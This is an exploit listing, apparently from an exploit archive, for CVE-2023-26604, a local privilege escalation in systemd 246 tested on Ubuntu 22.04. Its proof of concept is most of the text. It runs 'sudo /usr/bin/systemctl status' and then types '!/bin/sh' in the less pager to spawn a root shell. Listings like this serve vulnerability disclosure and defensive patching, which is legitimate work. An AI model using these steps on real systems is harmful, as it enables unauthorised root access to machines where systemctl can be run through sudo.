Share
## https://sploitus.com/exploit?id=PACKETSTORM:174130
# Exploit Title: systemd 246 - Local Privilege Escalation  
# Exploit Author: Iyaad Luqman K (init_6)  
# Application: systemd 246  
# Tested on: Ubuntu 22.04  
# CVE: CVE-2023-26604  
  
systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user.   
This vulnerability allows a local attacker to gain root privileges.  
  
## Proof Of Concept:  
1. Run the systemctl command which can be run as root user.  
  
sudo /usr/bin/systemctl status any_service  
  
2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.  
  
3. Type in `!/bin/sh` in the pager to spawn a shell as root user.